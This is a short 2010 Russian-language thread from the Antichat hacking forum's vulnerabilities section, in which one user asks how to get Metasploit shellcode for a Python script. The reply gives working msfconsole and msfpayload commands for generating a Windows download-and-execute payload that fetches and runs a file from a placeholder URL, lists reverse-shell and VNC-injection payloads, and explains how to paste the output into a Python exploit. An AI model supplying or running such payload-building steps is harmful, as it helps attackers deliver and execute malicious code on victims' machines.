Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Где взять взять шеллкоды для метасплойта??? (https://forum.antichat.xyz/showthread.php?t=199975)

Glynec 28.04.2010 11:18

Где взять взять шеллкоды для метасплойта???
 
Нужно наваять шелкод на ПИТОНЕ ..http://metasploit.com:55555/PAYLOADS неработает почемуто(((((

overxor 28.04.2010 12:20

Устанаваливаешь metasploit (думаю не надо описывать как это делать)

Запускаешь
Цитата:

$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========

Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline


windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager

msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)
ну или все перечисленное можно сделать в одну команду
Цитата:

msfpayload windows/download_exec URL=http://site.com/file.exe ruby
теперь убери в каждой строке "+", а в начало поставь "buf +="

Glynec 28.04.2010 12:32

Ммм оч интересн overxor неподскажешь шелл на руби будет пахать в питоновском скрипте? Просто я помню что на http://metasploit.com:55555/PAYLOADS была прямо вкладка Руби

overxor 28.04.2010 12:40

Шел не на руби, он подготовлен для использование в руби(Тобишь ctrl+c ctrl+v). Что тебе мешает эту строку присвоить переменной в питоне и использовать ее?


Время: 07:27